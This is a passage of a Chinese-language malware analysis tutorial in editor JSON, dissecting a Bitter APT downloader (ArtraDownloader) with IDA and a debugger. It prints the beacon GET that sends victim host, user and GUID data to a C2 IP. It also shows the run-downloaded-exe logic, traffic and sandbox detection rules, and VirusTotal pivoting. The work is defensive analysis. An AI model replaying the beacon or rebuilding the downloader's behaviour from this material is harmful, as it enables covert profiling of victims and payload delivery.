1fd043bc652d35c69abcc6f.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"數據及其來源","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"套接字連接成功後的第一個函數402F40裏調用了系統API“GetComputerNameA”,查看其保存獲取到數據ComputerName在何處被引用,發現函數402F40末尾有大量調用同一函數40C318和同一內存地址0x435598。在“GetComputerNameA”和函數40C318間,這部分代碼中有“GetUserNameA”、“RegQueryValueExA”、和“GetSystemInfo”等獲取信息的函數後,推測函數402F40爲計算機信息的字符串拼接:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/59/598c25052a2bd9b6230d92ad88abac1e.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"有了這個推測後,在最後一次調用40C318處下斷,數據窗口監視對應的首參內存地址“0x435598”:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d5/d58a0b2de2683595fe1bbd08c49bd8c1.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"確實拼接出帶有計算機信息的字符串“?a=HostName&b=COMPUTERNAME&c=Windows%207%20Professional&d=AdministratorAdministratorf9117a5d-b155-4a3e-b6c9-5ae181247d3b165536040965860”,可以分解爲以下的格式:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"a = [HostName] b = [ComputerName] c = [電腦系統信息] d = [UserName][GUID]","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"其中d值比較奇怪,使用交叉引用查看該寫入值的調用,可以發現其值爲UserName和調用“RegQueryValueExA”獲取的GUID:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/eb/ebd718b0e5d8542e2f834892ad3f8f1e.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"以懶人思維來說,定位這類數據來源的步驟是可以省略的,僅需","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"將計算機信息(如計算機名,用戶名,MAC地址、IP地址、GUID、甚至是偏門如C盤卷序列號的數據)修改或記錄其數據即可。","attrs":{}},{"type":"text","text":"上面圖中顯示的調試環境的計算機就是如此,一般分析了這麼多樣本,看到自己的GUID數據也能認出來,只是爲了演示一下如何交叉引用定位。或記住GUID格式爲“xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx”(8-4-4-4-12)。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"所以d值的數據爲[UserName][UserName][GUID][dwActiveProcessorMask][dwAllocationGranularity][dwOemId][dwPageSize][dwProcessorType][wProcessorArchitecture],現在又可以把[dwActiveProcessorMask][dwAllocationGranularity][dwOemId][dwPageSize][dwProcessorType][wProcessorArchitecture]數據記到小本本里了~","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"數據使用","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"將IDA中該儲存計算機數據的內存地址重命名後,查看該內存地址的交叉引用可以發現被多個函數調用,而最後一個調用的函數401080,該函數的首參(通常是比較重要的參數)後續成爲了“Send”函數參數中要發送的數據緩衝區,此處可以推測401080函數爲拼接待發送數據:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/82/825064e126c1d9b2d2fc3772caf1f979.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"跳轉到調用401080處,可以明顯看到是構建GET方法的HTTP報文數據。其實不用跳轉,通過傳參的數量/格式和前後調用的函數其實也可以推測出這段代碼是構建HTTP報文:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/08/0893a80fcd7e1897ea81f61c2b873ae6.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"Send發送上線包","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"查看“Send”函數的要發送的數據緩衝區(第二個參數地址),可以看到拼接好要發送的數據:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/04/0477220c30cb0e27b3e4d0826555857c.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"木馬程序發送的第一個包還帶有計算機信息的,通常可以叫做上線包:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"GET ///RguhsT/accept.php?a=HostName&b=COMPUTERNAME&c=Windows%207%20Professional&d=AdministratorAdministratorf9117a5d-b155-4a3e-b6c9-5ae181247d3b165536040965860&e=efgh HTTP/1.1 Host: 162.0.229.203","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"此處可以發現有比較明顯的流量特徵,家裏有沙箱/流量檢測設備的同學可以設置爲流量檢測規則:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"特徵:http_url=?a=*b=*c=*e= URL編碼後:http_url=a%3d*b%3d*c%3d*d%3d 加上GET方法爲:http_url=a%3d*b%3d*c%3d*d%3d&http_method=GET","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"這個規則的誤報率估計不低,給c值加上“Windows”可以降低一些誤報率","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"http_url=a%3d*b%3d*c%3dWindows*d%3d&http_method=GET","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"如果家裏有條件的同學,可以以安全研究/APT追蹤發現的角度設置該流量規則,然後再過一遍沙箱規則或YARA規則;如果是部署到客戶現場的流量檢測設備,則不建議部署。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"沙箱如果像我的調試環境一樣用戶名電腦名主機名是固定字符串的話,再寫死對其他值的判斷,基本就沒有誤報了。除非這個上線包來自開源項目,被很多惡意軟件使用,那就需要增加其他判斷條件,此步在下文的“通過VT擴線”中有詳述。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"Recv接受返回數據","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"一般“Send”發送上線包後就是“Recv”從遠程服務器接受命令或文件,查看“Recv”從遠程服務器獲取的數據有什麼交叉引用,發現函數408550明顯有C2指令判斷:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/9f/9f7112123873b9f904484f51ff59dd9d.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"有部分內存數據爲運行後才被解密的字符串,可以在上述的字符串解密操作後,在IDA裏將對應的內存地址重命名,或者在動態運行時已經是解密後的數據。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"爲了進入預定義C2指令的邏輯,可以在“Recv”執行後將函數408550的第二個參數手動修改爲“Yes file”,或者修改字符串對比判斷後的跳轉也行,具體看後續執行的代碼,本樣本直接修改跳轉更方便:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d7/d7cd2cf8ceb28b2e1f589ea3908d176a.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"一般接收C2指令後的判斷處建議做個快照,看看跳不跳轉分別執行了哪些功能。如當有多個C2指令進入不同的邏輯分支執行不同的代碼時,分析完其中一個跳轉後可以恢復快照,通過修改跳轉或下一跳地址(EIP)無縫銜接分析下一個分支邏輯。該樣本如果不滿足“Yes file”指令後的代碼邏輯就是退出,此處不做展示。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"進入“Yes file”的代碼邏輯後,可以明顯看到有大量對接收數據的操作,如提取數據的代碼:if判斷長度+DoWhile循環中嵌套一個if判斷數據,最後memmove保存:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/a3/a3574c11f2a4533f5f4cc79d6eec0a16.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"由於數據不方便公開及教學意義,此處按照無法獲取數據的情況進行接下來的分析。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"對接受的數據結合上下文代碼進行推測:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"1.一般來說,對數據進行各種提取/解密/判斷後的最後一個內存塊地址0x4351F7可以優先分析。發現最後被操作的內存塊在後續代碼中被函數40EB61多次調用;","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"2.函數40EB61最後一次調用的首參,同時也是字符串拼接函數“strcat”的首參,而拼接的另一個字符串爲解密後的字符串“.exe”;","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"3.那麼可以推測該文件爲一個exe文件,查看其交叉引用,發現是執行程序的函數“ShellExecuteA”的參數,並且執行動作的參數爲“open”——也就是運行了一個EXE文件:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/84/848067728e4d545042cf95cdddb009a1.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"而在調試器運行到“ShellExecuteA”之前,中間大部分的函數爲對文件的一些操作,可能會觸發一系列文件操作函數,這一步調試分析的意義不是很大。從遠程服務器獲取數據到本地執行的這個過程,或許有文件解密操作,通過逆出解密算法,可以還原出PE文件的加密數據(或者從流量裏Dump),寫出下載加密PE文件的流量規則。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"至此,該樣本的功能已經很清晰了,下載器運行後會收集受害機器的信息拼接爲字符串,構建上線包發送給遠程服務器,從遠程服務器獲取exe文件的數據並運行。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"這種有外連下載exe運行操作的惡意文件通常歸類爲下載器(Downloader/Loader),APT組織蔓靈花常使用下載器在受害機器上安裝其他的惡意功能插件,如鍵盤記錄器、文件記錄器或者遠控木馬。一般這些文件存放在下載器發送上線包的遠程服務器下,此時通過VT搜索IP或者域名,查看其關聯文件,可能會有收穫。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"通過VT擴線","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"搜索遠程服務器IP“162.0.229.203”,在“Relations”,可以看到多個域名,部分字符串“pop3”、“webmail”、“mail”和郵件服務相關,符合釣魚郵件攻擊的信息:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/9f/9f077be889325bcd4316a77c42c9a4e6.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"“Communicating Files”下也有多個關聯文件,通過時間可以發現來自多個攻擊活動:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/87/879c5063b89f1ddd12f1099130af783b.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"點開關聯文件中其他攻擊活動的樣本的“Behavior”,可以發現有兩個比較固定的信息。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"1.GET請求的URL:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/16/161be4dea41be09b137b55ff4e3a0e09.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"2.釋放文件到“C:\\intel\\logs\\dlhost.exe”:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/a1/a1320e0a097798186a72778aac4067ae.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"通過上面兩個信息,寫沙箱規則可以比較準確地抓到","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"初始攻擊","attrs":{}},{"type":"text","text":"載荷:","attrs":{}}]},{"type":"codeblock","attrs":{"lang":null},"content":[{"type":"text","text":"Files Dropped = C:\\\\intel\\\\logs\\\\dlhost.exe HTTP Requests = http_url=a%3d*b%3d*c%3dWindows*d%3d&http_method=GET","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"在IP的“Details”頁面可以看到其“Google Results”中,有關聯到蔓靈花歷史攻擊活動的報告,以及在線沙箱跑出的帶有該IP的報告:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/72/725128c313104003325f870013a5c853.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"從以往攻擊活動的在線沙箱報告中可以看到其他插件的信息,如在%TEMP%路徑下釋放文件“rgdl.exe”,該文件有PDB信息“D:\\C++\\Reg_Entry\\reg_en\\Release\\reg_en.pdb”,在蔓靈花早期的攻擊中曾名爲“regdl”:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/d3/d3095296ee017d6f0b0fa6559dca967a.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"“rgdl.exe”是一個註冊表操作器,將“audiodq.exe”路徑寫入註冊表的Run項,用於建立惡意可執行程序(“audiodq.exe”)的開機自啓動:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/ed/ed268d4161e8ed0e3377d0eac8df8f4e.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"上述兩個exe都是可以通過在線網站擴線到的蔓靈花常用的插件。再搜索這兩個字符串進行擴線,可以找到更多的歷史攻擊載荷、開源情報、甚至更完整的攻擊活動報告。從開源情報中發現該下載器被命名爲“ArtraDownloader”,源自2019年Palo Alto Networks公開發布的報告:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"image","attrs":{"src":"https://static001.geekbang.org/infoq/b6/b6ad1853d8b7d274e8b7c62c9c5b5fa7.jpeg","alt":"(零基礎教學系列)手把手教你分析APT:蔓靈花下載器樣本分析","title":null,"style":[{"key":"width","value":"75%"},{"key":"bordertype","value":"none"}],"href":null,"fromPaste":true,"pastePass":true}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null}},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"利用收集到的信息,組合搜索到以往歷史攻擊活動,發現多個本次活動未出現的插件,如鍵盤記錄器“Igfxsrvk.exe”,信息收集器“Lsap.exe”,遠控木馬“MSAServices”和“MSAServicet”等。雖然與本次攻擊活動的樣本無強關聯的關係,一般來說都是這幾個搭配着使用,可以作爲日常積累進行分析記錄。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"分析APT組織常用的TTPs(攻擊手法),將完整的攻擊鏈分解爲多個階段,將多次攻擊活動的樣本名稱、MD5、功能都記錄保存之後,以文件名、PDB信息、C2指令,沙箱行爲等信息進行組合,寫出多角度多層級的檢測規則。在理論理想(重音)的信息複利下,可以更好地發現、預警APT攻擊活動,跟蹤APT組織的手法演進。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"結語","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"蔓靈花的常用下載器ArtraDownloader分析到這裏就結束啦~","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"分析透一個經典的樣本後,就相當於掌握了一個類型的病毒,惡意功能和實現的代碼都是大同小異的。通過大量的分析和積累經驗《機器學習》理解原理後就可以更快的找到斷點和不同處。再將其特徵應用到檢測環境中,發現或追蹤APT組織的攻擊活動,甚至在大量的歷史攻擊手法演變數據下進行未來攻擊的預測(如","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"StrongPity","attrs":{}},{"type":"text","text":"(下期再見)),掌握先機拉取更多的惡意載荷,爲下一次極速響應爭取時間。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"最後多說幾句:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"爲了感謝讀者們,我想把我收藏的一些網絡安全/滲透測試學習乾貨貢獻給大家,回饋每一個讀者,希望能幫到你們。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"